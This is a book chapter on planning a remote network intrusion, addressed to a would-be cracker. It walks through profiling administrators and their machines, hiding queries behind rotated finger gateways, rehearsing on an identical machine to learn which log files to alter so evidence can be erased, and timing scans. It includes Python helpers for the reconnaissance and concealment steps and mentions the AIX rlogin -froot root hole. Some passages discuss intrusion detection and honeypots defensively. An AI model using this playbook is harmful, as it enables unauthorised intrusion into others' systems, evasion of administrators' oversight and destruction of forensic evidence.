The Remote Attack

What Is a Remote Attack?

A remote attack is any attack that is initiated against a machine that the attacker does not currently have control over; that is, it is an attack against any machine other than the attacker’s own (whether that machine is on the attacker’s subnet or 10,000 miles away). The best way to define a remote machine is this:

A remote machine is any machine–other than the one you are now on–that can be reached through some protocol over the Internet or any other network or medium.

The First Steps

The first steps, oddly enough, do not involve much contact with the target. (That is, they won’t if the cracker is smart.) The cracker’s first problem (after identifying the type of network, the target machines, and so on) is to determine with whom he is dealing. Much of this information can be acquired without disturbing the target. (We will assume for now that the target does not run a firewall. Most networks do not. Not yet, anyway.) Some of this information is gathered through the following techniques:

  • Running a host query. Here, the cracker gathers as much information as is currently held on the target in domain servers. Such a query may produce volumes of information (remember the query on Boston University in Chapter 9, “Scanners”?) or may reveal very little; much depends on the size and construction of the network. Under optimal circumstances (a large, well-established target), a host query maps out the machines and IPs within the domain in a very comprehensive fashion. The names of those machines may give the cracker a clue as to what names are being used in NIS (if applicable). Equally, the target may turn out to be a small outfit with only two machines; in that case, the information will naturally be sparse, identifying little more than the name server and the IPs of the two boxes (scarcely more than one could get from a WHOIS query). One interesting note: the type of operating system can often be discerned from such a query.
  • A WHOIS query. This will identify the technical contacts. Such information may seem innocuous. It isn’t. The technical contact is generally the person at least partially responsible for the day-to-day administration of the target. That person’s e-mail address will have some value. (Also, between this and the host query, you can determine whether the target is a real box, a leaf node, a virtual domain hosted by another service, and so on.)
  • Running some Usenet and Web searches. There are a number of searches the cracker might want to conduct before actually coming into contact with the target. One is to run the technical contact’s name through a search engine (using a forced, case-sensitive, this-string-only conditional search). The cracker is looking to see if the administrators and technical contacts sport much traffic in Usenet. Similarly, this address (or addresses) should be run through searchable archives of all applicable security mailing lists.
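The WHOIS step lends itself to a little automation. Here is a minimal Python sketch, with invented names and addresses, that pulls anything address-shaped out of raw WHOIS output; the field layout varies from registry to registry, so matching address-shaped tokens is more portable than hunting for a "Technical Contact" label:

```python
import re

def extract_contacts(whois_text):
    """Pull e-mail addresses (e.g., technical contacts) out of raw
    WHOIS output. Field layout varies by registry, so matching any
    address-shaped token is the most portable approach."""
    pattern = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
    seen, contacts = set(), []
    for match in pattern.findall(whois_text):
        addr = match.lower()
        if addr not in seen:      # preserve order, drop duplicates
            seen.add(addr)
            contacts.append(addr)
    return contacts

# Hypothetical WHOIS output for illustration only.
sample = """Registrant: Target Networks (TARGET-DOM)
   Technical Contact: Walrus, J.  walrus@target.net
   Billing Contact:   Smith, A.   billing@target.net"""

print(extract_contacts(sample))
```

Each address this turns up is a candidate for the Usenet and mailing-list searches described above.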

The techniques mentioned in this list may seem superfluous until you understand their value. Certainly, Farmer and Venema would agree on this point:

What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don’t stop there–you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find.


Cross Reference: The preceding paragraph is excerpted from Improving the Security of Your Site by Breaking Into It by Dan Farmer and Wietse Venema. It can be found online at

Collecting information about the system administrator is paramount. A system administrator is usually responsible for maintaining the security of a site. Administrators inevitably run into problems, and many cannot resist the urge to post to Usenet or mailing lists for answers to those problems. By taking the time to run the administrator’s address (and any variation of it, as I will explain shortly) through such archives, you may be able to gain greater insight into his network, his security, and his personality. Administrators who make such posts typically specify their architecture, a bit about their network topology, and their stated problem.

Even evidence of a match for that address (or lack thereof) can be enlightening. For example, if a system administrator is in a security mailing list or forum each day, disputing or discussing various security techniques and problems with fellow administrators, this is evidence of knowledge. In other words, this type of person knows security well and is therefore likely well prepared for an attack. Analyzing such a person’s posts closely will tell you a bit about his stance on security and how he implements it. Conversely, if the majority of his questions are rudimentary (and he often has a difficult time grasping one or more security concepts), it might be evidence of inexperience.

From a completely different angle, if his address does not appear at all on such lists or in such forums, there are only two likely explanations. One is that he is lurking in such groups. The other is that he is so bad-ass that he has no need to discuss security at all. (Basically, if he is on such lists at all, he DOES receive advisories, and that is, of course, a bad sign for the cracker, no matter which way you look at it. The cracker has to rely in large part on the administrator’s lack of knowledge. Most semi-secure platforms can be made relatively secure with even minimal effort by a well-trained system administrator.)

In short, these searches make a quick (and painless) attempt to cull some important information about the folks at the other end of the wire.

You will note that I referred to “any variation” of a system administrator’s address. Variations in this context mean any possible alternate addresses. There are two kinds of alternate addresses. The first kind is the individual’s personal address. That is, many system administrators may also have addresses at or on networks other than their own. (Some administrators are actually foolish enough to include these addresses in the fields provided for address on an InterNIC record.) So, while they may not use their work address to discuss (or learn about) security, it is quite possible that they may be using their home address.

To demonstrate, I once cracked a network located in California. The administrator of the site had an account on AOL. The account on AOL was used in Usenet to discuss various security issues. By following this man’s postings through Usenet, I was able to determine quite a bit. In fact (and this is truly extraordinary), his password, I learned, was the name of his daughter followed by the number 1.

The other kind of variation is the same username appearing on other machines within the administrator’s own network. Let’s make this a little clearer. First, on a network that is skillfully controlled, no personal name is associated with root. That is because root should be used as little as possible and viewed as a system ID, not to be invoked unless absolutely necessary. (In other words, because su and perhaps other commands or devices exist that allow an administrator to do his work, root need not be directly invoked, except in a limited number of cases.)


NOTE: Attacking a network run on Windows NT is a different matter. In those cases, you are looking to follow root (or rather, Administrator) on each box. The design of NT makes this a necessity, and Administrator on NT is vastly different from root on a UNIX box.

Because root is probably not invoked directly, the system administrator’s ID could be anything. Let’s presume here that you know that ID. Let’s suppose it is walrus. Let us further suppose that the host query you conducted turned up about 150 machines, each with a distinct name. For example, there might be mail.target.net, news.target.net, shell.target.net, cgi.target.net, and so forth. (Although, in practice, they will more likely have “theme” names that obscure what the machine actually does, like flounder.target.net or trout.target.net.)

The cracker should try the administrator’s address on each machine. Thus, he will be trying walrus@mail.target.net, walrus@news.target.net, and so forth. (This is what I refer to as a variation on a target administrator’s address.) In other words, try this on each box on the network, and run all the general diagnostic utilities against each of these machines as well. Perhaps walrus has a particular machine that he favors, and it is from this machine that he does his posting.
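Enumerating those variations is trivially scripted. A Python sketch, with the username, host names, and domain all hypothetical:

```python
def address_variations(username, hosts, domain):
    """Given an administrator's username and the machine names
    pulled from a host query, enumerate every address at which
    the admin might show up. All names here are illustrative."""
    variations = [f"{username}@{domain}"]  # the bare domain address
    variations += [f"{username}@{host}.{domain}" for host in hosts]
    return variations

# Host names as they might appear in a host-query result.
hosts = ["mail", "news", "shell", "cgi"]
for addr in address_variations("walrus", hosts, "target.net"):
    print(addr)
```

Each generated address then gets run through the same Usenet and mailing-list searches as the primary one.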

Here’s an interesting note: If the target is a provider (or other system that one can first gain legitimate access to), you can also gain an enormous amount of information about the system administrator simply by watching where he is coming in from. This, to some extent, can be done from the outside as well, with a combination of finger and rusers. In other words, you are looking to identify foreign networks (that is, networks other than the target) on which the system administrator has accounts. Obviously, if his last login was from Netcom, he has an account on Netcom. Follow that ID for a day or so and see what surfaces.

About Finger Queries

In the previously referenced paper by Farmer and Venema (a phenomenal and revolutionary document in terms of insight), one point is missed: The use of the finger utility can be a dangerous announcement of your activities. What if, for example, the system administrator is running MasterPlan?


TIP: MasterPlan is a utility I discuss in Chapter 13, “Techniques to Hide One’s Identity.” Its function is to trap and log all finger queries directed at a user; that is, MasterPlan will identify the IP address of the party doing the fingering, the time the fingering took place, the frequency of the fingering, and so forth. It basically attempts to gather as much information as possible about anyone who fingers you. Nor is MasterPlan the only risk: the system administrator might easily have written his own hacked finger daemon, one that perhaps even traces the route back to the original requesting party, or worse, fingers him in return.

To avoid the possibility of their finger queries raising any flags, most crackers use finger gateways. Finger gateways are Web pages, usually sporting a single input field, that point to a CGI program on the remote server that performs finger lookups. In Figure 25.1, I have provided an example of one such finger gateway. (This one is located at the University of Michigan Medical Center.)

FIGURE 25.1.
An example of a finger gateway at the University of Michigan.

By using a finger gateway, the cracker can obscure his source address. That is, the finger query is initiated by the remote system that hosts the finger gateway. (In other words, not the cracker’s own machine but some other machine.) True, an extremely paranoid system administrator might track down the source address of that finger gateway; he might even contact the administrator of the finger gateway site to have a look at the access log there. In this way, he could identify the fingering party. That this would happen, however, is quite unlikely, especially if the cracker staggers his gateways. In other words, if the cracker intends to do any of this type of work “by hand,” he should really do each finger query from a different gateway. Because there are 3,000+ finger gateways currently on the Web, this is not an unreasonable burden. Furthermore, if I were doing the queries, I would set them apart by several minutes (or ideally, several hours).
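The staggering logic itself is easily sketched in Python. The gateway URLs here are invented placeholders; a real list would come from a Web directory of finger gateways, and this sketch only builds a schedule rather than issuing any queries:

```python
import itertools
import random

# Hypothetical gateway URLs, for illustration only.
GATEWAYS = [
    "http://www.example-a.edu/cgi-bin/finger",
    "http://www.example-b.org/cgi-bin/finger",
    "http://www.example-c.net/finger.cgi",
]

def staggered_queries(targets, gateways, min_wait=300, max_wait=7200):
    """Pair each finger target with a rotating gateway and a random
    delay in seconds, so no two queries come from the same place in
    quick succession. Returns the schedule instead of executing it."""
    rotation = itertools.cycle(gateways)
    return [(target, next(rotation), random.randint(min_wait, max_wait))
            for target in targets]

plan = staggered_queries(["walrus@target.net", "root@target.net"], GATEWAYS)
for target, gateway, delay in plan:
    print(f"wait {delay}s, then query {target} via {gateway}")
```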


NOTE: One technique involves the redirection of a finger request, where the cracker issues a raw finger request to one finger server, asking it to retrieve information from another. This is referred to as forwarding a finger request. The syntax of such a command is finger user@final_host@intermediate_host (names here are placeholders); the query is delivered to the rightmost host, which strips its own name and forwards the remainder toward the left. For example, to finger a user at one host, you might use another host’s finger service to forward the request. However, in today’s climate, most system administrators have finger forwarding turned off.
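For illustration, here is a rough Python sketch of what a forwarded query amounts to on the wire. Hostnames are placeholders; under RFC 1288, the query line user@host is simply delivered to the intermediate server’s port 79, and the actual network call will fail against any server with forwarding disabled:

```python
import socket

FINGER_PORT = 79

def build_forwarded_query(user, final_host):
    """Build the raw request line for a forwarded finger query.
    Sent to an intermediate server, 'user@final_host' asks that
    server to finger 'user' on final_host on your behalf."""
    return f"{user}@{final_host}\r\n".encode("ascii")

def forward_finger(user, final_host, via_host, timeout=10):
    """Issue the query through via_host. Hostnames are placeholders;
    this fails unless via_host runs fingerd with forwarding enabled."""
    with socket.create_connection((via_host, FINGER_PORT), timeout) as s:
        s.sendall(build_forwarded_query(user, final_host))
        chunks = []
        while data := s.recv(4096):
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")

print(build_forwarded_query("walrus", "target.net"))
```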

The Operating System

You may have to go through various methods (including but not limited to those described in the preceding section) to identify the operating system and version being used on the target network. In earlier years, one could be pretty certain that the majority of machines on a target network ran similar software on similar hardware. Today, it is another ball game entirely. Today, networks may harbor dozens of different machines with disparate operating systems and architecture. One would think that for the cracker, this would be a hostile and difficult-to-manage environment. Not so.

The more diverse your network nodes are (in terms of operating system and architecture), the more likely it is that a security hole exists. There are reasons for this, and while I do not intend to explain them thoroughly, I will relate at least this: Each operating system has its own set of bugs. Some of these bugs are known, and some may be discovered over time. In a relatively large network, where there may be many different types of machines and software, you have a better chance of finding a hole. The system administrator is, at day’s end, only a human being. He cannot be constantly reviewing security advisories for each platform in turn. There is a strong chance that his security knowledge of this or that system is weak.

In any event, once you have identified the various operating systems and architectures at the target, the next step is study. Make a checklist that lists each operating system and machine type. This checklist will assist you tremendously in the next step, which is to identify all known holes on each platform and understand each one.
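Such a checklist can be as simple as a small data structure. A sketch follows; the hosts, OS versions, and holes shown are invented examples:

```python
# A minimal representation of the per-host checklist described above.
# Hosts, OS versions, architectures, and holes are all hypothetical.
checklist = [
    {"host": "mail.target.net",  "os": "SunOS 4.1.3", "arch": "sun4c",
     "known_holes": [], "researched": False},
    {"host": "shell.target.net", "os": "AIX 3.2",     "arch": "rs6000",
     "known_holes": ["rlogin -froot"], "researched": True},
]

def unresearched(checklist):
    """Return the hosts still awaiting a pass through the
    advisory archives."""
    return [entry["host"] for entry in checklist
            if not entry["researched"]]

print(unresearched(checklist))
```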


NOTE: Some analysts might argue that tools like ISS and SATAN will identify all such holes automatically and that research therefore need not be done. This is erroneous, for several reasons. First, such tools may not be complete in their assessment. Although both of the tools mentioned are quite comprehensive, they are not perfect; new holes emerge each day for a wide range of platforms. True, both tools are extensible, and one can therefore add new scan modules, but the scanning tools you have are limited to the programmer’s knowledge of the holes that existed when the application was coded.

Therefore, to write a new scanning module for these extensible applications, you must first know that such new holes exist. Second, and perhaps more importantly, simply knowing that a hole exists does not necessarily mean that you can exploit it; you must first understand it. (Unless, of course, the hole is an obvious and self-explanatory one, such as the -froot rlogin problem on some versions of the AIX operating system. By initiating an rlogin session with the -froot flag, you can gain instant privileged access on many older AIX-based machines.) For these reasons, hauling off and running a massive scan is a premature move.

To gather this information, you will need to visit a few key sites. The first such site you need to visit is the firewalls mailing list archive page.


Cross Reference: The firewalls mailing list archive page can be found online at

You may initially wonder why this list would be of value, because the subject discussed is firewall-related. (Remember, we began this chapter with the presumption that the target was not running a firewall.) The firewalls list archive is valuable because it is often used, over the objections of many list members, to discuss other security-related issues. Another invaluable source of such data is BUGTRAQ, which is a searchable archive of known vulnerabilities on various operating systems (though largely UNIX).


Cross Reference: BUGTRAQ is located online at

These searchable databases are of paramount importance. A practical example will help tremendously at this point. Suppose that your target is a machine running AIX. First, you would go to the ARC Searchable WAIS Gateway for DDN and CERT advisories.


Cross Reference: The ARC Searchable WAIS Gateway for DDN and CERT advisories can be found online at

At this stage, you can begin to do some research. After reading the initial advisory, if there is no more information than a simple description of the vulnerability, do not despair. You just have to go to the next level. The next phase is a little bit more complex. After identifying the most recent weakness (and having read the advisory), you must extract from that advisory (and all that follow it) the commonly used, often abbreviated, or “jargon,” name for the hole. For example, after a hole is discovered, it is often referred to by security folks with a name that may not reflect the entire problem. (An example would be “the Linux telnetd problem” or “AIX’s froot hole” or some other, brief term by which the hole becomes universally identified.) The extraction process is quickly done by taking the ID number of the advisory and running it through one of the abovementioned archives like BUGTRAQ or Firewalls. Here is why:

Typically, when a security professional posts an exploit script, a tester script (one that tests whether the hole exists), or a commentary, he will almost always include complete references to the original advisory. Thus, you will see something similar to this in the message: Here's a script to test if you are vulnerable to the talkd problem talked about in CA-97.04.

This message is referring to CERT Advisory number 97.04, which was first issued on January 27, 1997. By using this number as a search expression, you will turn up all references to it. After reading 10 or 12 results from such a search, you will know what the security crowd is calling that hole. After you have that, you can conduct an all-out search in all legitimate and underground database sources to get every shred of information about the hole. You are not looking for initial postings in particular, but subsequent, trailing ones. (Some archives have an option where you can specify a display by thread; these are preferred. This allows you to see the initial posting and all subsequent postings about that original message; that is, all the “re:” follow-ups.) However, some search engines do not provide for an output in threaded form; therefore, you will simply have to rake through them by hand.
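The extraction step can itself be scripted. Here is a hedged Python sketch that pulls CERT-style advisory numbers out of a batch of list messages and groups the messages by advisory; the message text is invented for illustration:

```python
import re

# Matches old-style CERT advisory IDs such as CA-97.04.
ADVISORY = re.compile(r"\bCA-\d{2}\.\d{2}\b")

def group_by_advisory(messages):
    """Index a batch of mailing-list messages by the CERT advisory
    numbers they mention, so follow-ups to one advisory can be
    read together as a thread."""
    index = {}
    for msg in messages:
        for adv in set(ADVISORY.findall(msg)):
            index.setdefault(adv, []).append(msg)
    return index

# Invented sample messages.
posts = [
    "Here's a script to test if you are vulnerable to the talkd "
    "problem talked about in CA-97.04.",
    "Re: CA-97.04 -- the patch also needs to cover ntalkd.",
    "Unrelated: anyone have the CA-96.21 exploit handy?",
]

index = group_by_advisory(posts)
print(sorted(index))           # which advisories appear
print(len(index["CA-97.04"]))  # how many messages discuss this one
```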

The reason that you want these follow-ups is because they usually contain exploit or test scripts (programs that automatically test for or simulate the hole). They also generally contain other technical information related to the hole. For example, one security officer might have found a new way to exploit the vulnerability, or might have found that an associated program (or include file or other dependency) is the real problem or a great contributor to the hole. The thoughts and reflections of these individuals are pure gold, particularly if the hole is a new one. These individuals are actually doing all the work for you: analyzing and testing the hole, refining attacks against it, and so forth.


TIP: Many exploit and test scripts are posted in standard shell or C language and are therefore a breeze to either reconfigure for your own system or compile for your architecture. In most instances, only minimal work has to be done to make them work on your platform.

So, to this point, you have defined a portion (or perhaps all) of the following chief points:

  • Who the administrator is
  • The machines on the network, and perhaps their functions and domain servers
  • Their operating systems
  • Their probable holes
  • Any discussion by the administrator about the topology, management, policies, construction, or administration of the network

Now you can proceed to the next step.

One point of interest: It is extremely valuable if you can also identify machines that may be co-located. This is, of course, strictly in cases where the target is an Internet service provider (ISP). ISPs often offer deals for customers to co-locate a machine on their wire. There are certain advantages to this for the customer. One of them is cost. If the provider offers to co-locate a box on its T3 for, say, $600 a month, this is infinitely less expensive than running a machine from your own office that hooks into a T1. A T1 runs about $900-$1,200 monthly. You can see why co-location is popular: You get speeds far faster for much less money and headache. For the ISP, it is nothing more than plugging a box into its Ethernet system. Therefore, even setup and administration costs are lower. And, perhaps most importantly of all, it takes the local telephone company out of the loop. Thus, you cut even more cost, and you can establish a server immediately instead of waiting six weeks.

These co-located boxes may or may not be administered by the ISP. If they are not, there is an excellent chance that these boxes either have (or will later develop) holes. This is especially likely if the owner of the box employs a significant amount of CGI or other self-designed program modules over which the ISP has little or no control. By compromising that box, you have an excellent chance of bringing the entire network under attack, unless the ISP has purposely strung the machine directly to its own router or a hub, or instituted some other procedure for segmenting the co-located boxes from the rest of the network.


NOTE: This can be determined to some degree using traceroute or whois services. In the case of traceroute, you can identify the position of the machine on the wire by examining the path of the traced route. In a whois query, you can readily see whether the box has its own domain server or whether it is using someone else’s (an ISP’s).

Doing a Test Run

The test-run portion of the attack is practical only for those individuals who are serious about cracking. Your average cracker will not undertake such activity, because it involves spending a little money. However, if I were counseling a cracker, I would recommend it.

This step involves establishing a single machine with the identical distribution as the target. Thus, if the target is a SPARCstation 2 running Solaris 2.4, you would erect an identical machine and string it to the Net via any suitable method (by modem, ISDN, Frame Relay, T1, or whatever you have available). After you have established the machine, run a series of attacks against it. There are two things you are looking for:

  • What the attacks are going to look like from the attacking side
  • What the attacks will look like from the victim’s side

There are a number of reasons for this, and some are not so obvious. By examining the logs on the attacking side, the cracker gains an idea of what the attack should look like if his target is basically unprotected; in other words, if the target is not running custom daemons. This provides the cracker a little road map: certainly, if his ultimate scan and attack of the target do not look nearly identical, that is cause for concern. All things being equal, an identically configured machine (or, I should say, an apparently identically configured machine) should respond identically. If it does not, the folks at the target have something up their sleeve. In this instance, the cracker would be wise to tread carefully.

By examining the victim-side logs, the cracker can see what his footprint will look like. This is also important to know. Different platforms have different logging procedures. The cracker should know, at a minimum, exactly what those logging procedures are; that is, he needs to know each and every file (on the identically configured machine) that will show evidence of an intrusion. This information is paramount, because it too serves as a road map: it shows him exactly which files have to be altered to erase evidence of his attack. The only way to identify these files for certain is to conduct a test in a controlled environment and examine the logs yourself.
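One crude way to pin down exactly which files record the intrusion is to checksum the candidate log files before and after the simulated attack and compare. A Python sketch; the log paths listed are typical UNIX locations and will differ by platform:

```python
import hashlib
import os

def snapshot(paths):
    """Record a checksum for each log file that exists."""
    state = {}
    for path in paths:
        if os.path.exists(path):
            with open(path, "rb") as f:
                state[path] = hashlib.md5(f.read()).hexdigest()
    return state

def changed_files(before, after):
    """Compare two snapshots; any file that appeared or changed
    between them recorded evidence of the test attack."""
    return sorted(path for path in after
                  if before.get(path) != after[path])

# Candidate log locations on a typical UNIX box (platform-dependent).
LOGS = ["/var/adm/messages", "/var/adm/wtmp",
        "/var/adm/lastlog", "/var/adm/pacct"]
# before = snapshot(LOGS)
# ... run the simulated attack ...
# print(changed_files(before, snapshot(LOGS)))
```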

In actual attacks, there should be only a few seconds (or minutes at most) before root (or some high level of privilege) is obtained. Similarly, it should be only seconds thereafter (or minutes at worst) before evidence of that intrusion is erased. For the cracker, any other option is a fatal one. He may not suffer from it in the short run, but in the long run, he will end up in handcuffs.

This step is not as expensive as you would think. There are newsgroups where one can obtain the identical machine (or a close facsimile) for a reasonable price. Generally, the seller of such a machine will load a full version of the operating system “for testing purposes only.” This is the seller’s way of saying “I will give you the operating system, which comes without a license and therefore violates the license agreement. If you keep it and later come under fire from the vendor, you are on your own.”

Even licensed resellers will do this, so you can end up with an identical machine without going to too much expense. (You can also go to defense contracting firms, many of which auction off their workstations for a fraction of their fair market value. The only bar here is that you must have the cash ready; you generally only get a single shot at a bid.)

Other possibilities include having friends set up such a box at their place of work or even at a university. All you really need are the logs. I have always thought that it would be a good study practice to maintain a database of such logs per operating system, per attack, and per scanner; in other words, a library of what such attacks look like, given the aforementioned variables. This, I think, would be a good training resource for new system administrators, something like “This is what an SS4 looks like when under attack by someone using ISS. These are the log files you need to look for, and this is how they will appear.”

Surely, a script could be fashioned (perhaps an automated one) that would run a comparative analysis against the files on your workstation. This process could be done once a day as a cron job. It seems to me that at least minimal intrusion-detection systems could be designed this way. Such tools do exist, but have been criticized by many individuals because they can be “fooled” too easily. There is an excellent paper that treats this subject, at least with respect to SunOS. It is titled USTAT: A Real Time Intrusion Detection System for UNIX. (This paper was, in fact, a thesis for the completion of a master’s in computer science at the University of California, Santa Barbara. It is very good.) In the abstract, the author writes:

In this document, the development of the first USTAT prototype, which is for SunOS 4.1.1, is described. USTAT makes use of the audit trails that are collected by the C2 Basic Security Module of SunOS, and it keeps track of only those critical actions that must occur for the successful completion of the penetration. This approach differs from other rule-based penetration identification tools that pattern match sequences of audit records.


Cross Reference: The preceding paragraph is excerpted from USTAT: A Real Time Intrusion Detection System for UNIX by Koral Ilgun. It can be found online at

Although we proceeded under the assumption that the target network was basically an unprotected, out-of-the-box install, I thought I should mention tools like the one described in the paper referenced previously. The majority of such tools have been employed on extremely secure networks–networks often associated with classified or even secret or top-secret work.

Another interesting paper lists a few of these tools and makes a brief analysis of each. It discusses how

Computer security officials at the system level have always had a challenging task when it comes to day-to-day mainframe auditing. Typically the auditing options/features are limited by the mainframe operating system and other system software provided by the hardware vendor. Also, since security auditing is a logical subset of management auditing, some of the available auditing options/features may be of little value to computer security officials. Finally, the relevant auditing information is probably far too voluminous to process manually and the availability of automated data reduction/analysis tools is very limited. Typically, 95% of the audit data is of no security significance. The trick is determining which 95% to ignore.


Cross Reference: The previous paragraph is excerpted from Summary of the Trusted Information Systems (TIS) Report on Intrusion Detection Systems, prepared by Victor H. Marshall, Systems Assurance Team Leader, Booz, Allen & Hamilton Inc. This document can be found online at

In any event, this “live” testing technique should be primarily employed where there is a single attack point. Typical situations are where you suspect that one of the workstations is the most viable target (where perhaps the others will refuse all connections from outside the subnet, and so forth). Obviously, I am not suggesting that you erect an exact model of the target network; that could be cost- and time-prohibitive. What I am suggesting is that in coordinating a remote attack, you need to have (at a minimum) some idea of what is supposed to happen. Simulating that attack on a host other than the target is a wise thing to do. Otherwise, you have no way of knowing whether the data you receive back has any integrity. Bellovin’s paper on Berferd should be a warning to any cracker that a simulation of a vulnerable network is not out of the question. In fact, I have wondered many times why security technologies have not focused entirely on this type of technique, especially since scanners have become so popular.

What is the difficulty in a system administrator creating his own such system on the fly? How difficult would it be for an administrator to write custom daemons (on a system where the targeted services aren’t even actually running) that would provide the cracker with bogus responses? Isn’t this better than announcing that you have a firewall (or TCP_WRAPPER), therefore alerting the attacker to potential problems? Never mind passive port-scanning utilities, let’s get down to the nitty-gritty: This is how to catch a cracker–with a system designed exclusively for the purpose of creating logs that demonstrate intent. This, in my opinion, is where some new advances ought to be made. These types of systems offer automation to the process of evidence gathering.

The agencies that typically utilize such tools are few. Mostly, they are military organizations. An interesting document is available on the Internet in regard to military evaluations and intrusion detection. What is truly interesting about the document is the flair with which it is written. For instance, sample this little excerpt:

For 20 days in early spring 1994, Air Force cybersleuths stalked a digital delinquent raiding unclassified computer systems at Griffiss AFB, NY. The investigators had staked out the crime scene–a small, 12-by-12-foot computer room in Rome Laboratory’s Air Development Center–for weeks, surviving on Jolt cola, junk food and naps underneath desks. Traps were set by the Air Force Information Warfare Center to catch the bandit in the act, and `silent’ alarms sounded each time their man slinked back to survey his handiwork. The suspect, who dubbed himself `Data Stream,’ was blind to the surveillance, but despite this, led pursuers on several high-speed chases that don’t get much faster–the speed of light. The outlaw was a computer hacker zipping along the ethereal lanes of the Internet, and tailing him was the information superhighway patrol–the Air Force Office of Special Investigations computer crime investigations unit.


Cross Reference: The previous paragraph is excerpted from “Hacker Trackers: OSI Computer Cops Fight Crime On-Line” by Pat McKenna. It can be found online at

The document doesn’t give as much technical information as one would want, but it is quite interesting, all the same. Probably a more practical document for the legal preservation of information in the investigation of intrusions is one titled “Investigating and Prosecuting Network Intrusions.” It was authored by John C. Smith, Senior Investigator in the Computer Crime Unit of the Santa Clara County District Attorney’s Office.


Cross Reference: “Investigating and Prosecuting Network Intrusions” can be found online at

In any event, as I have said, at least some testing should be done beforehand. That can only be done by establishing a like box with like software.

Tools: About Holes and Other Important Features

Next, you need to assemble the tools you will actually use. These tools will most probably be scanners. You will be looking (at a minimum) to identify all services now running on the target. Based on your analysis of the operating system (as well as the other variables I’ve mentioned in this chapter), you will need to evaluate your tools to determine what areas or holes they do not cover.

In instances where a particular service is covered by one tool but not another, it is best to integrate the two tools. The ease of integration will depend largely on whether these tools can simply be attached as external modules to a scanner like SATAN or SAFESuite. Again, here the use of a test run can be extremely valuable; in most instances, you cannot simply attach an external program and have it work flawlessly.

To determine exactly how all these tools will work in concert, it is best to test them together at least on some machine (even if it is not identical to the target). That is because, here, we are concerned with whether the scan will be somehow interrupted or corrupted as the result of running two or more modules of disparate design. Remember that a real-time scanning attack should be done only once. If you screw it up, you might not get a second chance.

So, you will be picking your tools (at least for the scan) based on what you can reasonably expect to find at the other end. In some cases, this is an easy job. For example, perhaps you already know that someone on the box is running X Window System applications across the Net. (Not bloody likely, but not unheard of.) In that case, you will also be scanning for xhost problems, and so it goes.

Remember that a scanner is a drastic solution. It is the equivalent of running up to an occupied home with a crowbar in broad daylight, trying all the doors and windows. If the system administrator is even moderately tuned into security issues, you have just announced your entire plan.


TIP: There are some measures you can take to avoid that announcement, but they are drastic: You can institute the same security procedures that other networks do, including installing software (sometimes a firewall and sometimes not) that will refuse to report your machine’s particulars to the target. There are serious problems with this type of technique, however, as it requires a high level of skill. (Also, many tools will be rendered useless by instituting such techniques. Some tools are designed so that one or more functions require the ability to go out of your network, through the router, and back inside again.)

Again, however, we are assuming here that the target is not armored; it’s just an average site, which means that we needn’t stress too much about the scan. Furthermore, as Dan Farmer’s recent survey suggests, scanning may not be a significant issue anyway. According to Farmer (and I have implicit faith in his representations, knowing from personal experience that he is a man of honor), the majority of networks don’t even notice the traffic:

…no attempt was made to hide the survey, but only three sites out of more than two thousand contacted me to inquire what was going on when I performed the unauthorized survey (that’s a bit over one in one thousand questioning my activity). Two were from the normal survey list, and one was from my random group.


Cross Reference: The preceding paragraph is excerpted from the introduction of Shall We Dust Moscow? by Dan Farmer. This document can be found online at

That scan involved over 2,000 hosts, the majority of which were fairly sensitive sites (for example, banks). You would expect that these sites would be ultra-paranoid, filtering every packet and immediately jumping on even the slightest hint of a scan.

Developing an Attack Strategy

The days of roaming around the Internet, cracking this and that server, are basically over. Years ago, compromising the security of a system was viewed as a minor transgression as long as no damage was done. Today, the situation is different. Today, the value of data is an increasingly discussed issue. Therefore, the modern cracker would be wise not to crack without a reason. Similarly, he would be wise to set about cracking a server only with a particular plan.

The only instance in which this does not apply is where the cracker is either located in a foreign state that has no specific law against computer intrusion (Berferd again) or one that provides no extradition procedure for that particular offense (for example, the NASA case involving a student in Argentina). All other crackers would be wise to tread very cautiously.

Your attack strategy may depend on what you want to accomplish. We will assume, however, that the task at hand is basically nothing more than compromise of system security. If this is your plan, you need to lay out how the attack will be accomplished. The longer the scan takes (and the more machines that are included within it), the more likely it is that it will be immediately discovered. Also, the more scan data that you have to sift through, the longer it will take to implement an attack based upon that data. The time that elapses between the scan and the actual attack, as I’ve mentioned, should be short.

Some things are therefore obvious (or should be). If you determine from all of your data collection that certain portions of the network are segmented by routers, switches, bridges, or other devices, you should probably exclude those from your scan. After all, compromising those systems will likely produce little benefit. Suppose you gained root on one such box in a segment. How far do you think you could get? Do you think that you could easily cross a bridge, router, or switch? Probably not. Therefore, sniffing will only render relevant information about the other machines in the segment, and spoofing will likewise work (reliably) only against those machines within the segment. Because what you are looking for is root on the main box (or at least, within the largest network segment available), it is unlikely that a scan on smaller, more secure segments would prove to be of great benefit.


NOTE: Of course, if these machines (for whatever reason) happen to be the only ones exposed, by all means, attack them (unless they are completely worthless). For example, it is a common procedure to place a Web server outside the network firewall or make that machine the only one accessible from the void. Unless the purpose of the exercise is to crack the Web server (and cause some limited, public embarrassment to the owners of the Web box), why bother? These machines are typically “sacrificial” hosts–that is, the system administrator has anticipated losing the entire machine to a remote attack, so the machine has nothing of import upon its drives. Nothing except Web pages, that is.

In any event, once you have determined the parameters of your scan, implement it.

A Word About Timing Scans

When should you implement a scan? The answer to this is really “never.” However, if you are going to do it, I would do it late at night relative to the target. Because it is going to create a run of connection requests anyway (and because it would take much longer if implemented during high-traffic periods), I think you might as well take advantage of the graveyard shift. The shorter the time period, the better off you are.

After the Scan

After you have completed the scan, you will be subjecting the data to analysis. The first issue you want to get out of the way is whether the information is even authentic. (This, to some degree, is established from your sample scans on a like machine with the like operating system distribution.)

Analysis is the next step. This will vary depending upon what you have found. Certainly, the documents included in the SATAN distribution can help tremendously in this regard. Those documents (tutorials about vulnerabilities) are brief, but direct and informative. They address the following vulnerabilities:

  • FTP vulnerabilities
  • NFS export to unprivileged programs
  • NFS export via portmapper
  • NIS password file access
  • REXD access
  • SATAN password disclosure
  • Sendmail vulnerabilities
  • TFTP file access
  • Remote shell access
  • Unrestricted NFS export
  • Unrestricted X server access
  • Unrestricted modem
  • Writeable FTP home directory

In addition to these pieces of information, you should apply any knowledge that you have gained through the process of gathering information on the specific platform and operating system. In other words, if a scanner reports a certain vulnerability (especially a newer one), you should refer back to the database of information that you have already built from raking BUGTRAQ and other searchable sources.

